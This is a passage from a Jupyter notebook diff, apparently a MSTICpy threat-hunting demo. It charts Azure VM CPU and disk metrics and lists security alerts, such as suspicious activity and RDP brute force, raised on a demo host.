FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\",\"#FDE724\"],\"index\":[240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"3116\"},\"selection_policy\":{\"id\":\"3117\"}},\"id\":\"3103\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"3098\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"3074\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{},\"id\":\"3058\",\"type\":\"BasicTicker\"},{\"attributes\":{\"label\":{\"value\":\"Disk Write\"},\"renderers\":[{\"id\":\"3107\"}]},\"id\":\"3130\",\"type\":\"LegendItem\"},{\"attributes\":{\"axis\":{\"id\":\"3057\"},\"dimension\":1,\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"3060\",\"type\":\"Grid\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"3066\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"3096\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"3061\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"source\":{\"id\":\"3103\"}},\"id\":\"3108\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"3084\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"axis\":{\"id\":\"3053\"},\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"3056\",\"type\":\"Grid\"},{\"attributes\":{\"data_source\":{\"id\":\"3103\"},\"glyph\":{\"id\":\"3105\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3106\"},\"selection_glyph\":null,\"view\":{\"id\":\"3108\"}},\"id\":\"3107\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"3099\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"3089\"},{\"id\":\"3090\"},{\"id\":\"3091\"},{\"id\":\"3092\"},{\"id\":\"3093\"},{\"id\":\"3094\"},{\"id\":\"3095\"},{\"id\":\"3096\"},{\"id\":\"3097\"},{\"id\":\"3098\"},{\"id\":\"3099\"},{\"id\":\"3100\"}]},\"id\":\"3054\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"3076\"},\"glyph\":{\"id\":\"3078\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3079\"},\"selection_glyph\":null,\"view\":{\"id\":\"3081\"}},\"id\":\"3080\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"3095\",\"type\":\"DaysTicker\"},{\"attributes\":{\"line_alpha\":0.7,\"line_color\":\"#440154\",\"line_width\":2,\"x\":{\"field\":\"Time\"},\"y\":{\"field\":\"Data\"}},\"id\":\"3078\",\"type\":\"Line\"},{\"attributes\":{\"label\":{\"value\":\"Disk Read\"},\"renderers\":[{\"id\":\"3080\"}]},\"id\":\"3102\",\"type\":\"LegendItem\"}],\"root_ids\":[\"3042\"]},\"title\":\"Bokeh Application\",\"version\":\"2.1.1\"}};\n",
+       "  var render_items = [{\"docid\":\"98498484-337b-41de-bb8e-13f4f3e47330\",\"root_ids\":[\"3042\"],\"roots\":{\"3042\":\"c9d58b3b-6f2c-413e-af27-d7c087a5913d\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "3042"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'3042', <span id=\"3279\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[DatetimeAxis(id='3053', ...)],</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='3056', ...), Grid(id='3060', ...), Legend(id='3101', ...)],</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;None,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[LinearAxis(id='3057', ...)],</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;50,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;'#e5e5e5',</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">plot_height&nbsp;=&nbsp;400,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">plot_width&nbsp;=&nbsp;900,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">renderers&nbsp;=&nbsp;[GlyphRenderer(id='3080', ...), GlyphRenderer(id='3107', ...)],</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='3043', ...),</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='3067', ...),</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'above',</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;None,</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;Range1d(id='3045', ...),</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;LinearScale(id='3049', ...),</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;DataRange1d(id='3047', ...),</div></div><div class=\"3278\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;LinearScale(id='3051', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"3279\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"3278\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ],
+      "text/plain": [
+       "Figure(id='3042', ...)"
+      ]
+     },
+     "execution_count": 23,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Get metrics from the Azure virtual machine.\n",
+    "mets = az.get_metrics(metrics=\"Percentage CPU,Disk Read Bytes,Disk Write Bytes\", resource_id=res_id, sub_id=sub_id, sample_time=\"hour\", start_time=10)\n",
+    "\n",
+    "disk_read_data = mets['Disk Read Bytes']\n",
+    "disk_read_data['Type'] = 'Disk Read'\n",
+    "disk_write_data = mets['Disk Write Bytes']\n",
+    "disk_write_data['Type'] = \"Disk Write\"\n",
+    "disk_data = pd.concat([disk_read_data, disk_write_data])\n",
+    "\n",
+    "# Visualize those metrics\n",
+    "nbdisplay.display_timeline_values(data=mets['Percentage CPU'], title=\"Host CPU Usage\", time_column = 'Time', y='Data', height=400, source_columns=['Time', 'Data'], kind='line', range_tool=False)\n",
+    "nbdisplay.display_timeline_values(data=disk_data, title=\"Host Disk Usage\", time_column = 'Time', y='Data', height=400, source_columns=['Time', 'Data'], kind='line', group_by='Type', range_tool=False)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Host Alerts\n",
+    "One thing we want to investigate in more detail is any security alerts associated with the host. Security Alerts contain complex, detailed data that is hard to read in a regular Pandas DataFrame. To make it easier, MSTICpy provides an interactive widget to allow you to pick alerts from a list and see the details in an expanded output format.\n",
+    "\n",
+    "\n",
+    "> Note: Previously we were getting data from a query provider we provided the query as a string. Part of the MSTICpy dataprovider functionality is to be able to create and store parameterized queries (in YAML files). MSTICpy comes with a set of [pre-built queries](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataQueries.html) for many common scenarios. Below we use one fo these to get a list of alerts related to the host we are investigating.\n",
+    "\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 24,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>AlertDisplayName</th>\n",
+       "      <th>AlertName</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Description</th>\n",
+       "      <th>ProviderName</th>\n",
+       "      <th>VendorName</th>\n",
+       "      <th>VendorOriginalId</th>\n",
+       "      <th>SystemAlertId</th>\n",
+       "      <th>ResourceId</th>\n",
+       "      <th>SourceComputerId</th>\n",
+       "      <th>AlertType</th>\n",
+       "      <th>ConfidenceLevel</th>\n",
+       "      <th>ConfidenceScore</th>\n",
+       "      <th>IsIncident</th>\n",
+       "      <th>StartTimeUtc</th>\n",
+       "      <th>EndTimeUtc</th>\n",
+       "      <th>ProcessingEndTime</th>\n",
+       "      <th>RemediationSteps</th>\n",
+       "      <th>ExtendedProperties</th>\n",
+       "      <th>Entities</th>\n",
+       "      <th>SourceSystem</th>\n",
+       "      <th>WorkspaceSubscriptionId</th>\n",
+       "      <th>WorkspaceResourceGroup</th>\n",
+       "      <th>ExtendedLinks</th>\n",
+       "      <th>ProductName</th>\n",
+       "      <th>ProductComponentName</th>\n",
+       "      <th>AlertLink</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>src_hostname</th>\n",
+       "      <th>src_accountname</th>\n",
+       "      <th>src_procname</th>\n",
+       "      <th>host_match</th>\n",
+       "      <th>acct_match</th>\n",
+       "      <th>proc_match</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>2020-07-10 19:09:23+00:00</td>\n",
+       "      <td>Suspicious Activity Detected</td>\n",
+       "      <td>Suspicious Activity Detected</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Analysis of host data has detected a sequence of one or more processes running on BlackHatDemoHo...</td>\n",
+       "      <td>Detection-WarmPathV2</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>e3549ae5-3e95-4be7-8ba8-9e1b9d97e926</td>\n",
+       "      <td>2518078950729219999_e3549ae5-3e95-4be7-8ba8-9e1b9d97e926</td>\n",
+       "      <td>/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/BlackHatDemo/providers/Micros...</td>\n",
+       "      <td>73a015ec-e2b6-4bf7-b353-ebeafb54254e</td>\n",
+       "      <td>VM_SuspiciousActivity</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>0.0</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-07-10 18:28:47+00:00</td>\n",
+       "      <td>2020-07-10 18:37:39+00:00</td>\n",
+       "      <td>2020-07-10 19:09:54+00:00</td>\n",
+       "      <td>[\\r\\n  \"Review each of the individual line items in this alert to see if you recognize them as l...</td>\n",
+       "      <td>{\\r\\n  \"Machine Name\": \"BlackHatDemoHos\",\\r\\n  \"Command List\": \"FTP session was established.\\nNe...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"HostName\": \"BlackHatDemoHos\",\\r\\n    \"AzureID\": \"/subscripti...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>40dcc8bf-0478-4f3b-b275-ed0a94f2c013</td>\n",
+       "      <td>asihuntomsworkspacerg</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>https://portal.azure.com/#blade/Microsoft_Azure_Security/AlertBlade/alertId/2518078950729219999_...</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>BlackHatDemoHos</td>\n",
+       "      <td>BlackHatDemoHos</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>2020-07-10 19:09:23+00:00</td>\n",
+       "      <td>Suspicious Activity Detected</td>\n",
+       "      <td>Suspicious Activity Detected</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Analysis of host data has detected a sequence of one or more processes running on BlackHatDemoHo...</td>\n",
+       "      <td>Detection-WarmPathV2</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>e3549ae5-3e95-4be7-8ba8-9e1b9d97e926</td>\n",
+       "      <td>95ba8569-5df3-351e-b082-ce9666943e0b</td>\n",
+       "      <td>/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/BlackHatDemo/providers/Micros...</td>\n",
+       "      <td>73a015ec-e2b6-4bf7-b353-ebeafb54254e</td>\n",
+       "      <td>VM_SuspiciousActivity</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>0.0</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-07-10 18:28:47+00:00</td>\n",
+       "      <td>2020-07-10 18:37:39+00:00</td>\n",
+       "      <td>2020-07-10 19:09:54+00:00</td>\n",
+       "      <td>[\\r\\n  \"Review each of the individual line items in this alert to see if you recognize them as l...</td>\n",
+       "      <td>{\\r\\n  \"Machine Name\": \"BlackHatDemoHos\",\\r\\n  \"Command List\": \"FTP session was established.\\nNe...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"HostName\": \"BlackHatDemoHos\",\\r\\n    \"AzureID\": \"/subscripti...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>40dcc8bf-0478-4f3b-b275-ed0a94f2c013</td>\n",
+       "      <td>asihuntomsworkspacerg</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>https://portal.azure.com/#blade/Microsoft_Azure_Security/AlertBlade/alertId/2518078950729219999_...</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>BlackHatDemoHos</td>\n",
+       "      <td>BlackHatDemoHos</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>2020-07-10 18:41:18+00:00</td>\n",
+       "      <td>RDP Brute Force</td>\n",
+       "      <td>RDP Brute Force</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td></td>\n",
+       "      <td>ASI Scheduled Alerts</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>52c2edec-dc25-445e-b81a-b54bf44570a3</td>\n",
+       "      <td>cf949989-cf21-7ae1-5c02-56122b111f43</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0_765132a3-cf2f-40cf-b45c-cd6be9b942b7</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-07-10 18:27:28+00:00</td>\n",
+       "      <td>2020-07-10 18:27:39+00:00</td>\n",
+       "      <td>2020-07-10 18:41:18+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"let bruteforce_hosts = (\\r\\nSecurityEvent\\r\\n| where Computer contains \\\"blackh...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"174.127.235.80\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n ...</td>\n",
